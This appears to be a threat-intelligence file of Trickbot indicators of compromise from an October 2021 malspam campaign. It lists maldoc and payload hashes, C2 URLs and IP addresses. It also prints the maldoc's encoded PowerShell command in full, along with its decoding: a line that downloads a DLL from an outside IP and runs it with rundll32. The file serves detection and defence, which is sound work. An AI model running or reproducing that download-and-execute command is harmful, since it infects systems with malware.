-
Notifications
You must be signed in to change notification settings - Fork 84
/
2021-10-21 Trickbot IOCs
52 lines (40 loc) · 1.48 KB
/
2021-10-21 Trickbot IOCs
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
THREAT IDENTIFICATION: TRICKBOT
SUBJECTS OBSERVED
Message from "RNP8678YIXE"
SENDERS OBSERVED
MALDOC FILE HASHES
RNP-00(193).xlsm
b5ab49172507bbbb1d247730cf4ccf8b
POWERSHELL COMMANDS FROM MALDOC
cmd.exe [2868]
C:\Windows\System32\cmd.exe /c start /B /WAIT powershell -enc SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACIAaAB0AHQAcAA6AC8ALwA0ADUALgA4ADYALgA2ADUALgAxADkANwAvAGkAbQBhAGcAZQBzAC8AcwB1AGIAegBlAHIAbwAuAHAAbgBnACIAIAAtAE8AdQB0AEYAaQBsAGUAIAAiAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAGMAbABiAC4AZABsAGwAIgA= & start C:\Windows\System32\rundll32.exe C:\ProgramData\clb.dll,AloperNoteW
Decodes to:
Invoke-WebRequest -Uri "http://45.86.65.197/images/subzero.png" -OutFile "C:\ProgramData\clb.dll"
TRICKBOT PAYLOAD DOWNLOAD URL
http://45.86.65.197/images/subzero.png
TRICKBOT PAYLOAD FILE HASHES
subzero.png
1cb1a805d778e782a8fc0614d83970c0
rpclbjt.dmo (32-bit .dll)
cc8d1fd779312f615dfeca4cfb63bcce
renamed to clb.dll
clb.dll
cc8d1fd779312f615dfeca4cfb63bcce
TRICKBOT GTAG
gtag: rob136
TRICKBOT C2s
http://202.84.76.58:443/rob136/WIN7PC_W617601.F353BB3593F71DBB3FBFB3395BB773FF/90/
http://203.80.170.81:443/rob136/WIN7PC_W617601.F353BB3593F71DBB3FBFB3395BB773FF/84/
https://179.189.229.254/rob136/WIN7PC_W617601.F353BB3593F71DBB3FBFB3395BB773FF/5/file/
ADDITIONAL TCP TRAFFIC
5.152.175.57:443
36.66.188.251:443
60.51.47.65:443
65.152.201.203:443
79.106.115.107:443
105.27.205.34:443
176.58.123.25:443
179.189.229.254:443
185.56.175.122:443
202.84.76.58:443